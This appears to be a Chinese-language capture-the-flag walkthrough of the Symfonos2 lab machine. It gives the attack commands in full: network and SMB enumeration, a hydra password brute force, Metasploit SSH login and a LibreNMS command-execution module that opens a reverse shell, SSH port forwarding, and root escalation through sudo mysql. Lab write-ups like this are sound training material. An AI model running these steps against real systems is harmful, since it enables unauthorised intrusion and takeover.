-
探测靶机IP
arp-scan --interface eth1 -l -
扫描靶机开放端口
nmap -sS -p- 10.1.1.147靶机开放了21、22、80、139、445端口
-
浏览器访问80 端口
普通普片,啥也没有
-
扫描目录
dirsearch -u http://10.1.1.147没有其他可以访问的路径
-
查看共享文件夹
smbclient -L 10.1.1.147
发现anonymous共享文件夹
-
查看anonymous 文件夹
smbclient //10.1.1.147/anonymous
-
发现一个log.txt 文件,下载下来看一下
get log.txt
cat log.txt
发现了一个叫aeolus 的用户
-
知道用户名之后, 可也尝试使用hydra 进行密码爆破
hydra -l aeolus -U /usr/share/wordlists/rockyou.txt ftp://10.1.1.147
爆破成功!拿到了账密:aeolus \ sergioteamo
-
使用爆破出来的账密进行ssh 登录
ssh aeolus@10.1.1.147
登录成功!
-
使用SSH登录的情况下会对很多命令有限制
-
知道了账号密码,那就使用msf 工具进行SSH登录启动metasploit 工具
msfconsole
查找ssh 登录模块
search ssh_login
-
使用第一个
use 0
查看一下需要设置那些选项
show options -
设置目标地址、账号、密码然后运行
连接成功!
-
将sessions 会话升级为一个meterpreter会话 查看sessions 会话
sessions
-
升级会话
sessions -u 1使用第二个会话
-
查看网络相关信息
netstat
发现8080端口只允许靶机本身连接 -
进行端口转发
将本地的9999端口映射到靶机的8080端口
ssh -Nf -L 8888:127.0.0.1:8080 aeolus@10.1.1.147 将本地机器的8888端口映射到远程机器的127.0.0.1的8080端口 执行此命令后,本地机器的8888端口将被转发到远程机器的8080端口。你可以通过在本地浏览器中访问
http://localhost:8888
来访问远程机器上的服务。 -
访问一下本地的8888 端口
-
发现网站使用的是libreNMS 系统
使用msf 查看一下该系统是否存在漏洞
search libreNMS -
发现两个命令执行漏洞
使用第一个
use 1
show options 查看一下需要设置的选项 -
需要设置五个参数
set PASSWORD sergioteamo
set RHOSTS 127.0.0.1
set RPORT 8888
set USERNAME aeolus
set LHOST 10.1.1.128
run -
利用成功!切换到Shell 模式
python -c "import pty;pty.spawn('/bin/bash')" -
提权
查看一下可以执行哪些特殊权限命令
sudo -l -
发现可以用root 权限执行mysql
mysql 提权
sudo mysql -e '! /bin/sh' -
在家目录查看proof.txt 文件
-
完成!
symfonos2 靶机
于 2023-11-28 16:04:03 首次发布